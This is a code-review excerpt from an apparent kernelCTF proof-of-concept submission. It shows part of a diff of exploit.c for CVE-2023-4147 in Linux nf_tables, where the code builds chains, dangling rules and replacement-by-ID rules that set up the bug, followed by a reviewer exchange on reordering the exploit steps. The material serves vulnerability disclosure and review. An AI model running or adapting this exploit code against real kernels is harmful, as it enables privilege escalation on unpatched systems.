pocs/linux/kernelctf/CVE-2023-4147_lts_cos/exploit/lts-6.1.36/exploit.c

```diff
@@ -0,0 +1,839 @@
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+    nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain2_name);
+    nftnl_rule_add_expr(rule_bind_chain_1_2, expr_immediate);
+
+    struct nftnl_rule * rule_bind_chain_1_2_del = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_bind_chain_1_2_del, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_bind_chain_1_2_del, NFTNL_RULE_CHAIN, chain1_name);
+    nftnl_rule_set_u64(rule_bind_chain_1_2_del, NFTNL_RULE_HANDLE, 5);
+
+    struct nftnl_rule * rule_bind_chain_2_3 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_bind_chain_2_3, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_u32(rule_bind_chain_2_3, NFTNL_RULE_CHAIN_ID, 1337);
+
+    expr_immediate = nftnl_expr_alloc("immediate");
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+    nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain3_name);
+    nftnl_rule_add_expr(rule_bind_chain_2_3, expr_immediate);
+
+    struct nftnl_rule * rule_bind_chain_2_4 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_bind_chain_2_4, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_u32(rule_bind_chain_2_4, NFTNL_RULE_CHAIN_ID, 1337);
+
+    expr_immediate = nftnl_expr_alloc("immediate");
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+    nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain4_name);
+    nftnl_rule_add_expr(rule_bind_chain_2_4, expr_immediate);
+
+    struct nftnl_rule * rule_dangling_3 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_dangling_3, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_dangling_3, NFTNL_RULE_CHAIN, chain1_name);
+
+    expr_immediate = nftnl_expr_alloc("immediate");
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+    nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain3_name);
+    nftnl_rule_add_expr(rule_dangling_3, expr_immediate);
+
+    struct nftnl_rule * rule_dangling_4 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_dangling_4, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_str(rule_dangling_4, NFTNL_RULE_CHAIN, chain1_name);
+
+    expr_immediate = nftnl_expr_alloc("immediate");
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
+    nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
+    nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain4_name);
+    nftnl_rule_add_expr(rule_dangling_4, expr_immediate);
+
+    struct nftnl_rule * rule_replace_3 = nftnl_rule_alloc();
+
+    nftnl_rule_set_str(rule_replace_3, NFTNL_RULE_TABLE, table1_name);
+    nftnl_rule_set_u32(rule_replace_3, NFTNL_RULE_CHAIN_ID, 1337);
```

Comment:
We're doing rule replace in this exploit by ID, as this chain is already bound by `rule_bind_chain_1_2`. Following our conversation in PR#111. Could we change the logic of exploit, to firstly create `rule_bind_chain_2_3` then call replacement with `rule_dangling_3` and then trigger deletion of `rule_bind_chain_1_2`? If so, we would not need to add the `rule_dangling_3` to the chain by ID?

Reply:
We can create rule_bind_chain_1_2 later to bound the chain2 late, so we can replace rule_bind_chain_2_3 without using the chain ID. I think this is a missed point in CVE-2023-4147 and CVE-2023-5197  handles it by preventing replacing on chains with the bound flag present.